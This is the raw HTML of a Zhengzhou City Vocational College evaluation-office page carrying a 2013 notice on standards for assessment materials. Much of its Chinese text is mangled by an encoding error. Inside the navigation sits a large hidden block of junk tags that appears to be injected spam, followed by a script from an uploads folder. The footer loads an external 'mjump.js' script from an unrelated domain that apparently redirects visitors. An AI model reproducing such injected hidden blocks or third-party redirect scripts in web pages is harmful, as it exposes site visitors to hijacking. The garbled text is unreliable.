ï»? 关于下发《高职评估材料的规范标准及要求》的通知-郑州城市职业学院-评估办公å®?/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><thead id='tf3cq'></thead><label id='tf3cq'><blockquote id='tf3cq'></blockquote></label><p id='tf3cq'></p><small id='tf3cq'><ul id='tf3cq'><bdo id='tf3cq'><dir id='tf3cq'></dir><noframes id='tf3cq'><li id='tf3cq'></li></noframes><small id='tf3cq'></small><ins id='tf3cq'></ins><blockquote id='tf3cq'></blockquote></bdo></ul></small><fieldset id='tf3cq'></fieldset><span id='tf3cq'></span><tfoot id='tf3cq'></tfoot><em id='tf3cq'></em><select id='tf3cq'></select><q id='tf3cq'><sub id='tf3cq'><i id='tf3cq'></i></sub><thead id='tf3cq'><strong id='tf3cq'></strong></thead></q><ul id='tf3cq'></ul><dir id='tf3cq'></dir><code id='tf3cq'><ins id='tf3cq'></ins></code><bdo id='tf3cq'><label id='tf3cq'><pre id='tf3cq'><fieldset id='tf3cq'></fieldset></pre></label></bdo><big id='tf3cq'><ul id='tf3cq'><noframes id='tf3cq'></noframes><tfoot id='tf3cq'><sub id='tf3cq'><sup id='tf3cq'><p id='tf3cq'><legend id='tf3cq'></legend><noframes id='tf3cq'><dd id='tf3cq'><tbody id='tf3cq'><td id='tf3cq'><optgroup id='tf3cq'><strong id='tf3cq'></strong></optgroup><address id='tf3cq'><ul id='tf3cq'></ul></address><big id='tf3cq'></big></td><table id='tf3cq'></table></tbody><pre id='tf3cq'></pre></dd><span id='tf3cq'><b id='tf3cq'></b></span></noframes></p></sup></sub></tfoot><option id='tf3cq'></option></ul></big><address id='tf3cq'><abbr id='tf3cq'></abbr></address><strike id='tf3cq'><font id='tf3cq'></font></strike><ul id='tf3cq'><tbody id='tf3cq'></tbody></ul><sup id='tf3cq'><li id='tf3cq'></li></sup><legend id='tf3cq'></legend><label id='tf3cq'><i id='tf3cq'><td id='tf3cq'><tfoot id='tf3cq'></tfoot><pre id='tf3cq'></pre></td></i></label><strong id='tf3cq'><del id='tf3cq'></del></strong><button id='tf3cq'></button><p id='tf3cq'><tbody id='tf3cq'><q id='tf3cq'><noscript id='tf3cq'><kbd id='tf3cq'></kbd></noscript></q></tbody></p><thead id='tf3cq'><table id='tf3cq'><em id='tf3cq'></em><noscript id='tf3cq'><dl id='tf3cq'><abbr id='tf3cq'></abbr></dl></noscript></table></thead><sup id='tf3cq'></sup><em id='tf3cq'><sub id='tf3cq'><i id='tf3cq'><option id='tf3cq'></option></i><select id='tf3cq'><ul id='tf3cq'></ul></select></sub><center id='tf3cq'><i id='tf3cq'></i></center></em><button id='tf3cq'></button><kbd id='tf3cq'><table id='tf3cq'><em id='tf3cq'><strong id='tf3cq'><ol id='tf3cq'><option id='tf3cq'></option></ol></strong></em><blockquote id='tf3cq'><tfoot id='tf3cq'></tfoot><small id='tf3cq'><b id='tf3cq'></b></small></blockquote><table id='tf3cq'><sup id='tf3cq'><td id='tf3cq'><dt id='tf3cq'><i id='tf3cq'><label id='tf3cq'></label></i></dt></td><div id='tf3cq'></div></sup></table></table><style id='tf3cq'></style></kbd><th id='tf3cq'><noframes id='tf3cq'></noframes></th><div id='tf3cq'></div><dt id='tf3cq'><dd id='tf3cq'></dd><div id='tf3cq'></div></dt><style id='tf3cq'><acronym id='tf3cq'><style id='tf3cq'></style></acronym></style><tr id='tf3cq'><dt id='tf3cq'><small id='tf3cq'></small></dt></tr><ins id='tf3cq'></ins><tt id='tf3cq'></tt><big id='tf3cq'><form id='tf3cq'><tt id='tf3cq'></tt><fieldset id='tf3cq'><center id='tf3cq'><fieldset id='tf3cq'></fieldset></center><ol id='tf3cq'><select id='tf3cq'><style id='tf3cq'><q id='tf3cq'></q><strong id='tf3cq'><tfoot id='tf3cq'><ul id='tf3cq'><legend id='tf3cq'></legend></ul></tfoot></strong></style><abbr id='tf3cq'><dfn id='tf3cq'><noscript id='tf3cq'><sub id='tf3cq'></sub></noscript><li id='tf3cq'></li></dfn></abbr></select><ol id='tf3cq'></ol><dir id='tf3cq'></dir></ol></fieldset><abbr id='tf3cq'><legend id='tf3cq'><acronym id='tf3cq'></acronym></legend><th id='tf3cq'></th></abbr><table id='tf3cq'><strike id='tf3cq'><button id='tf3cq'></button></strike></table></form></big><button id='tf3cq'><style id='tf3cq'></style></button><em id='tf3cq'></em><code id='tf3cq'><dir id='tf3cq'><em id='tf3cq'></em></dir></code><thead id='tf3cq'></thead><dd id='tf3cq'><blockquote id='tf3cq'><table id='tf3cq'><font id='tf3cq'></font><strike id='tf3cq'><optgroup id='tf3cq'><abbr id='tf3cq'><strong id='tf3cq'></strong></abbr></optgroup></strike></table></blockquote></dd><center id='tf3cq'></center><strong id='tf3cq'></strong><small id='tf3cq'><q id='tf3cq'></q></small><font id='tf3cq'></font><ul id='tf3cq'><abbr id='tf3cq'></abbr><dd id='tf3cq'><dd id='tf3cq'><pre id='tf3cq'></pre><ol id='tf3cq'></ol><ins id='tf3cq'></ins></dd></dd><em id='tf3cq'><b id='tf3cq'></b><u id='tf3cq'><code id='tf3cq'></code></u></em></ul><label id='tf3cq'></label><tr id='tf3cq'><style id='tf3cq'><blockquote id='tf3cq'><dfn id='tf3cq'><label id='tf3cq'></label></dfn><th id='tf3cq'></th></blockquote></style><strong id='tf3cq'><strike id='tf3cq'><q id='tf3cq'></q></strike></strong><legend id='tf3cq'></legend><tr id='tf3cq'></tr></tr><ul id='tf3cq'><label id='tf3cq'><li id='tf3cq'></li></label></ul><tbody id='tf3cq'><dir id='tf3cq'><abbr id='tf3cq'><font id='tf3cq'></font></abbr></dir></tbody><bdo id='tf3cq'><fieldset id='tf3cq'><ol id='tf3cq'></ol><noscript id='tf3cq'></noscript></fieldset><td id='tf3cq'></td></bdo><fieldset id='tf3cq'><option id='tf3cq'><ul id='tf3cq'><td id='tf3cq'><legend id='tf3cq'></legend><del id='tf3cq'></del><ins id='tf3cq'></ins><form id='tf3cq'><table id='tf3cq'></table><th id='tf3cq'><tr id='tf3cq'><tt id='tf3cq'><dfn id='tf3cq'><select id='tf3cq'><optgroup id='tf3cq'><select id='tf3cq'></select></optgroup><del id='tf3cq'><small id='tf3cq'></small></del><dd id='tf3cq'><center id='tf3cq'></center></dd></select></dfn><dfn id='tf3cq'></dfn></tt></tr></th></form><dt id='tf3cq'></dt></td></ul></option><tbody id='tf3cq'></tbody><q id='tf3cq'><strong id='tf3cq'></strong></q></fieldset><li id='tf3cq'></li><ul id='tf3cq'></ul><button id='tf3cq'></button><blockquote id='tf3cq'></blockquote><td id='tf3cq'><i id='tf3cq'><span id='tf3cq'></span><style id='tf3cq'><center id='tf3cq'></center><strike id='tf3cq'><code id='tf3cq'><thead id='tf3cq'><button id='tf3cq'></button><div id='tf3cq'><legend id='tf3cq'></legend></div><li id='tf3cq'></li></thead><abbr id='tf3cq'></abbr></code></strike></style><dd id='tf3cq'><th id='tf3cq'></th></dd></i></td><style id='tf3cq'></style><optgroup id='tf3cq'><sup id='tf3cq'><tbody id='tf3cq'></tbody><sup id='tf3cq'></sup></sup></optgroup><select id='tf3cq'><abbr id='tf3cq'><address id='tf3cq'><strike id='tf3cq'></strike></address></abbr><address id='tf3cq'><legend id='tf3cq'></legend></address></select><ol id='tf3cq'></ol><code id='tf3cq'></code><strike id='tf3cq'><button id='tf3cq'></button><tr id='tf3cq'></tr></strike><center id='tf3cq'><del id='tf3cq'><sup id='tf3cq'></sup></del><dt id='tf3cq'><td id='tf3cq'></td></dt></center><sup id='tf3cq'></sup><dt id='tf3cq'></dt><th id='tf3cq'><span id='tf3cq'></span><dd id='tf3cq'><td id='tf3cq'><code id='tf3cq'><center id='tf3cq'></center><acronym id='tf3cq'><td id='tf3cq'><table id='tf3cq'><bdo id='tf3cq'></bdo></table></td></acronym></code></td></dd></th><label id='tf3cq'></label><code id='tf3cq'><kbd id='tf3cq'><big id='tf3cq'><u id='tf3cq'></u></big><th id='tf3cq'></th></kbd></code><form id='tf3cq'><dl id='tf3cq'></dl><th id='tf3cq'><button id='tf3cq'><dd id='tf3cq'></dd></button><form id='tf3cq'><address id='tf3cq'></address></form></th><li id='tf3cq'><li id='tf3cq'></li><td id='tf3cq'><font id='tf3cq'><ol id='tf3cq'><select id='tf3cq'><blockquote id='tf3cq'><dd id='tf3cq'><table id='tf3cq'><dl id='tf3cq'></dl></table><form id='tf3cq'></form><fieldset id='tf3cq'><u id='tf3cq'><i id='tf3cq'><div id='tf3cq'><table id='tf3cq'></table></div></i></u></fieldset><b id='tf3cq'></b></dd></blockquote><li id='tf3cq'><center id='tf3cq'><dir id='tf3cq'></dir></center><table id='tf3cq'></table></li></select></ol><font id='tf3cq'></font></font></td></li></form><q id='tf3cq'><form id='tf3cq'></form><blockquote id='tf3cq'><code id='tf3cq'></code></blockquote></q><abbr id='tf3cq'></abbr><sub id='tf3cq'></sub><q id='tf3cq'><pre id='tf3cq'><em id='tf3cq'></em></pre></q><select id='tf3cq'><dt id='tf3cq'><tr id='tf3cq'></tr></dt><small id='tf3cq'><noscript id='tf3cq'><strong id='tf3cq'></strong><tbody id='tf3cq'></tbody></noscript></small></select><del id='tf3cq'><big id='tf3cq'><u id='tf3cq'></u></big></del><ul id='tf3cq'></ul><fieldset id='tf3cq'><ul id='tf3cq'></ul></fieldset><strike id='tf3cq'><ins id='tf3cq'></ins><button id='tf3cq'></button></strike><span id='tf3cq'></span><table id='tf3cq'><select id='tf3cq'><legend id='tf3cq'><bdo id='tf3cq'></bdo></legend></select></table><kbd id='tf3cq'></kbd><dd id='tf3cq'></dd><fieldset id='tf3cq'></fieldset><p id='tf3cq'><style id='tf3cq'></style><table id='tf3cq'></table><strong id='tf3cq'></strong><ul id='tf3cq'></ul></p><ul id='tf3cq'></ul><label id='tf3cq'></label><dl id='tf3cq'><code id='tf3cq'><q id='tf3cq'><option id='tf3cq'></option></q></code></dl><tr id='tf3cq'></tr><acronym id='tf3cq'></acronym><small id='tf3cq'><style id='tf3cq'><tt id='tf3cq'><option id='tf3cq'><dl id='tf3cq'><ul id='tf3cq'></ul><div id='tf3cq'><q id='tf3cq'><fieldset id='tf3cq'><noframes id='tf3cq'><label id='tf3cq'><u id='tf3cq'><fieldset id='tf3cq'><pre id='tf3cq'></pre></fieldset></u></label><tr id='tf3cq'></tr><address id='tf3cq'><abbr id='tf3cq'><tt id='tf3cq'><span id='tf3cq'><p id='tf3cq'><noframes id='tf3cq'><strike id='tf3cq'></strike></noframes></p></span><dir id='tf3cq'><dir id='tf3cq'><table id='tf3cq'><pre id='tf3cq'></pre></table><legend id='tf3cq'><dd id='tf3cq'><sup id='tf3cq'></sup><del id='tf3cq'></del></dd><b id='tf3cq'></b><address id='tf3cq'></address><li id='tf3cq'></li></legend></dir></dir></tt><abbr id='tf3cq'></abbr><blockquote id='tf3cq'></blockquote><center id='tf3cq'></center></abbr></address></noframes><div id='tf3cq'><center id='tf3cq'><pre id='tf3cq'><b id='tf3cq'><code id='tf3cq'></code><table id='tf3cq'></table></b><optgroup id='tf3cq'><font id='tf3cq'></font><kbd id='tf3cq'></kbd></optgroup></pre></center><noframes id='tf3cq'></noframes></div></fieldset></q><address id='tf3cq'></address></div><dir id='tf3cq'></dir></dl></option></tt></style><div id='tf3cq'><i id='tf3cq'></i></div></small><bdo id='tf3cq'></bdo><form id='tf3cq'><select id='tf3cq'></select></form><code id='tf3cq'><strong id='tf3cq'><table id='tf3cq'><table id='tf3cq'></table><acronym id='tf3cq'></acronym></table></strong><q id='tf3cq'><label id='tf3cq'></label></q><span id='tf3cq'><address id='tf3cq'></address></span><noframes id='tf3cq'><dfn id='tf3cq'><optgroup id='tf3cq'></optgroup></dfn><tfoot id='tf3cq'><bdo id='tf3cq'><div id='tf3cq'></div><i id='tf3cq'><dt id='tf3cq'></dt></i></bdo></tfoot></noframes></code><b id='tf3cq'></b><table id='tf3cq'><acronym id='tf3cq'></acronym></table><q id='tf3cq'><dfn id='tf3cq'></dfn></q><p id='tf3cq'><noframes id='tf3cq'><ul id='tf3cq'></ul></noframes></p><select id='tf3cq'></select><acronym id='tf3cq'></acronym><legend id='tf3cq'></legend><small id='tf3cq'><kbd id='tf3cq'></kbd></small><del id='tf3cq'></del><option id='tf3cq'><blockquote id='tf3cq'><ins id='tf3cq'><big id='tf3cq'><p id='tf3cq'><sup id='tf3cq'></sup></p><span id='tf3cq'></span><b id='tf3cq'><thead id='tf3cq'><option id='tf3cq'><span id='tf3cq'></span></option></thead><table id='tf3cq'><ins id='tf3cq'><option id='tf3cq'><sub id='tf3cq'></sub></option></ins></table></b><table id='tf3cq'></table></big></ins></blockquote></option><abbr id='tf3cq'></abbr><p id='tf3cq'><label id='tf3cq'><tt id='tf3cq'><font id='tf3cq'><li id='tf3cq'><ul id='tf3cq'></ul></li></font><tt id='tf3cq'><ul id='tf3cq'></ul></tt></tt><strong id='tf3cq'></strong><div id='tf3cq'></div><dir id='tf3cq'></dir><fieldset id='tf3cq'><option id='tf3cq'></option></fieldset><pre id='tf3cq'></pre></label><dfn id='tf3cq'><tr id='tf3cq'></tr></dfn></p><fieldset id='tf3cq'><font id='tf3cq'><kbd id='tf3cq'></kbd><blockquote id='tf3cq'></blockquote></font><fieldset id='tf3cq'></fieldset></fieldset><optgroup id='tf3cq'><em id='tf3cq'></em></optgroup><sub id='tf3cq'></sub><dfn id='tf3cq'></dfn><em id='tf3cq'></em><div id='tf3cq'><kbd id='tf3cq'><td id='tf3cq'></td><dt id='tf3cq'><table id='tf3cq'></table></dt></kbd></div><option id='tf3cq'></option><span id='tf3cq'><big id='tf3cq'><strong id='tf3cq'><button id='tf3cq'><td id='tf3cq'><tfoot id='tf3cq'></tfoot></td><sub id='tf3cq'><dl id='tf3cq'><dt id='tf3cq'><small id='tf3cq'></small></dt><button id='tf3cq'><legend id='tf3cq'></legend></button><em id='tf3cq'></em><thead id='tf3cq'></thead><style id='tf3cq'><table id='tf3cq'><tbody id='tf3cq'></tbody><bdo id='tf3cq'></bdo></table></style></dl></sub><label id='tf3cq'></label></button><noscript id='tf3cq'></noscript></strong></big></span><label id='tf3cq'><ul id='tf3cq'><b id='tf3cq'><ol id='tf3cq'></ol><code id='tf3cq'><sub id='tf3cq'><ins id='tf3cq'><tt id='tf3cq'></tt></ins></sub></code><b id='tf3cq'><sub id='tf3cq'><small id='tf3cq'></small><blockquote id='tf3cq'></blockquote><center id='tf3cq'><style id='tf3cq'></style></center><label id='tf3cq'><dt id='tf3cq'></dt><p id='tf3cq'><span id='tf3cq'><noframes id='tf3cq'><fieldset id='tf3cq'></fieldset></noframes></span></p></label></sub><legend id='tf3cq'></legend></b></b></ul></label><q id='tf3cq'><tr id='tf3cq'><kbd id='tf3cq'></kbd><th id='tf3cq'><kbd id='tf3cq'></kbd></th></tr></q><li id='tf3cq'></li><noframes id='tf3cq'></noframes><tt id='tf3cq'><th id='tf3cq'></th><legend id='tf3cq'><strong id='tf3cq'><big id='tf3cq'></big></strong></legend></tt><sup id='tf3cq'><i id='tf3cq'><small id='tf3cq'><ins id='tf3cq'></ins></small><pre id='tf3cq'></pre></i></sup><td id='tf3cq'></td><center id='tf3cq'><thead id='tf3cq'></thead></center><i id='tf3cq'></i><style id='tf3cq'><fieldset id='tf3cq'></fieldset></style><th id='tf3cq'></th><label id='tf3cq'><form id='tf3cq'></form></label><tbody id='tf3cq'></tbody><center id='tf3cq'><td id='tf3cq'></td><dl id='tf3cq'></dl></center><blockquote id='tf3cq'><acronym id='tf3cq'></acronym></blockquote><noscript id='tf3cq'></noscript></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动æ€?/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘?/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠ?/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置ï¼?a href="/pgw/">首页</a> > 最新公å‘?> 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公å®?/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动æ€?/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘?/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠ?/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>最新公å‘?/h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>关于下发《高职评估材料的规范标准及要求》的通知</h1> <div class="info">发布时间ï¼?013å¹?2æœ?2日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=903"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p><font size="5"><font color="#333333"><font face="仿宋_GB2312">各处室、系部:<span lang="EN-US"><o:p></o:p></span></font></font></font></p> <p align="left" class="MsoNormal" style="background: white; margin: 0cm 0cm 0pt; text-indent: 30pt; line-height: 28pt; text-align: left; mso-line-height-rule: exactly; mso-char-indent-count: 2.0; mso-pagination: widow-orphan"><span style="font-size: 15pt; color: #333333; font-family: 仿宋_GB2312; mso-hansi-font-family: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">根据学院<span lang="EN-US">12</span>æœ?span lang="EN-US">10</span>日评估工作专题会议要求,各部门评估任务分解书已下发,各部门逐步展开材料的前期梳理工作。为配合评估材料整理、收集、建档和报送工作的开展,提高材料整理效率,避免反复返工,评估办制定了《高职评估材料的规范标准及要求》(详见附件),请各部门结合实际,严格参照规范标准和要求准备各项材料ã€?span lang="EN-US"><o:p></o:p></span></span></p> <p align="right" class="MsoNormal" style="background: white; margin: 0cm 7.5pt 0pt 0cm; text-indent: 23.05pt; line-height: 28pt; text-align: right; mso-line-height-rule: exactly; mso-pagination: widow-orphan"><span lang="EN-US" style="font-size: 15pt; color: #333333; font-family: 仿宋_GB2312; mso-hansi-font-family: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt"><o:p> </o:p></span></p> <p align="right" class="MsoNormal" style="background: white; margin: 0cm 37.5pt 0pt 0cm; text-indent: 23.05pt; line-height: 28pt; text-align: right; mso-line-height-rule: exactly; mso-pagination: widow-orphan"><span style="font-size: 15pt; color: #333333; font-family: 仿宋_GB2312; mso-hansi-font-family: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">评估办公å®?span lang="EN-US"><o:p></o:p></span></span></p> <p align="right" class="MsoNormal" style="background: white; margin: 0cm 0cm 0pt; text-indent: 23.05pt; line-height: 28pt; text-align: right; mso-line-height-rule: exactly; mso-pagination: widow-orphan"><span style="font-size: 15pt; color: #333333; font-family: 仿宋_GB2312; mso-hansi-font-family: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">二○一三年十二月十二日</span></p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编ï¼?52370 电话ï¼?371-69213333 <br> 豫ICPå¤?2014925å? </div> <script type="text/javascript" src="https://js.users.51.la/19550489.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>